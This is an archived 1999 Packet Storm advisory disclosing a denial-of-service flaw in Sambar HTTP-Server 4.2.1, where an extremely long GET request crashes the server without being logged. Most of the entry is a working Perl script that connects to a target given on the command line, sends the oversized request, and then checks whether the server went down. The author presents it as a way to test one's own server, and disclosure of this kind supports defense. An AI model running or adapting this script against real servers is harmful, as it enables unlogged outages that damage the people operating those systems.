Sambar_DoS.txt

1999-10-05T00:00:00
ID PACKETSTORM:16283
Type packetstorm
Reporter Packet Storm
Modified 1999-10-05T00:00:00

Description

                                        
                                            `While testing the security of the Sambar HTTP-Server I found it vulnerable  
to a simple DOS attack. Sending a "GET XXXX(...a lot of Xs..)XXXX HTTP/1.0"  
crashes the Server. It will die WITHOUT logging the attack.  
  
My testing-environment:  
  
Sambar 4.2.1  
M$IE 5.0 (de)  
Windows 95 C (de)  
  
Sample exploit code follows.  
  
Dennis Conrad (dennis@linuxstart.com)  
  
--------------------  
  
#!/usr/bin/perl  
  
#########  
# Sample DOS against the Sambar HTTP-Server  
# This was tested against Sambar 4.2.1 running on Windows95 C  
# This attack will NOT be logged! Only use it to determine if  
# your Server is vulnerable!  
#  
# Dennis Conrad (dennis@linuxstart.com)  
#  
  
use IO::Socket;  
  
print "+++++++++\n";  
print "+ Simple DOS-attack against the Sambar HTTP-Server (tested 4.2.1)\n";  
print "+ Found on the 3rd of October 1999 by dennis\@linuxstart.com\n\n";  
  
if ($#ARGV != 0) {  
die "+ Please give the host address as argument\n"  
}  
  
opensocket ("\n");  
print $remote "GET " . "X" x 99999999999999999999 . " HTTP/1.0\n\n";  
close $remote;  
  
opensocket ("\n+ The server seemed to be vulnerable to this attack\n");  
close $remote;  
die "+ The server does not seem to be vulnerable to this attack\n";  
  
sub opensocket {  
$remote = IO::Socket::INET->new (  
Proto => "tcp",  
PeerAddr => $ARGV[0],  
PeerPort => "http(80)",  
) || die "+ Can't open http-port on $ARGV[0]$_[0]";  
$remote->autoflush(1)  
}  
  
# EOF  
--------------------------  
Do you do Linux? :)  
Get your FREE @linuxstart.com email address at: http://www.linuxstart.com  
`